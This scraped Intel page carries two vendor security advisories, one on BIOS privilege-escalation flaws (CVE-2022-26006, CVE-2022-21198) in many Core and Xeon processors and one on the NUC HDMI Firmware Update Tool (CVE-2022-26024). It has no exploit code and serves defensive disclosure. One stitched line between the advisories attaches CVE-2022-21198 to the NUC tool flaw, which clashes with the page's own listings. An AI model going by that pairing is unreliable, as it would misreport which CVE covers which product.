*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.3 IPU – BIOS Advisory**

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26006

Description: Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-21198

Description: Time-of-check time-of-use race condition in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.9 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

**Affected Products:**

CVE-2022-26006

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

Intel® Xeon® Processor E5 v3 Family

Server

306F2

6F

Intel® Xeon® Processor E5 v4 Family,  
Intel® Core™ X-Series Processors

Server

406F1

EF

_1This product has met its End of Servicing Updates (ESU).  For customers interested in extending updates beyond ESU, please contact your Intel representative for details._

CVE-2022-21198

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

11th Gen Intel® Core™ processor

Intel® Xeon® W processor

Server, Workstation

A0671

02

11th Gen Intel® Core™ processor family

Desktop

A0671

02

11th Generation Intel® Core Processor Family

Mobile

806D1

806C1

806C2

C2

80

12th Generation Intel® Core™ Processor Family

Intel® Pentium® Gold Processor Family

Intel® Celeron® Processor Family

Desktop

90672

90675

01

12th Generation Intel® Core Processor Family

Mobile

906A3  
906A4

11

12th Generation Intel® Core™ Processor Family

Intel® Pentium® Gold Processor Family

Intel® Celeron® Processor Family

Mobile

906A4

07

10th Generation Intel® Core™ Processor Family

Mobile

706E5

80

Intel® Core™ Processors with Intel® Hybrid Technology

Mobile

806A1

10

Intel® Pentium® Silver N6000 Processor Family, Intel® Celeron® N4000 and N5000 Processor Families

Desktop,

Mobile

906C0

01

10th Generation Intel® Core™ Processors

Desktop,

Workstation

A0653

A0655

22

10th Generation Intel® Core™ Processors

Intel® Xeon® W processor family

Mobile,

Workstation

A0660

A0661

80

10th Generation Intel® Core™ Processor Family

Intel® Xeon® W processor family

Mobile,

Workstation

A0652

20

10th Gen Intel® Core™ processor

10000/1200 series

Pentium® Gold processor series

Celeron® processor 5000 series

Mobile

806EC

94

**Recommendations:**

Intel recommends that users of listed Intel® Processors update to the latest versions provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These  issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21198: INTEL-SA-00688

Improper access control in the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® NUC HDMI Firmware Update Tool Advisory**

**Summary: **

A potential security vulnerability in the Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26024

Description: Improper access control in the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score:  6.7 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7.

**Recommendations:**

Intel recommends updating the Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN to version 1.78.2.0.7 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19749/hdmi-firmware-update-tool-for-nuc7i3dn-nuc7i5dn-nuc7i7dn.html

**Acknowledgements:**

Intel would like to thank Hazem Brini ( 7azimo - Jungsu ) for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#firefox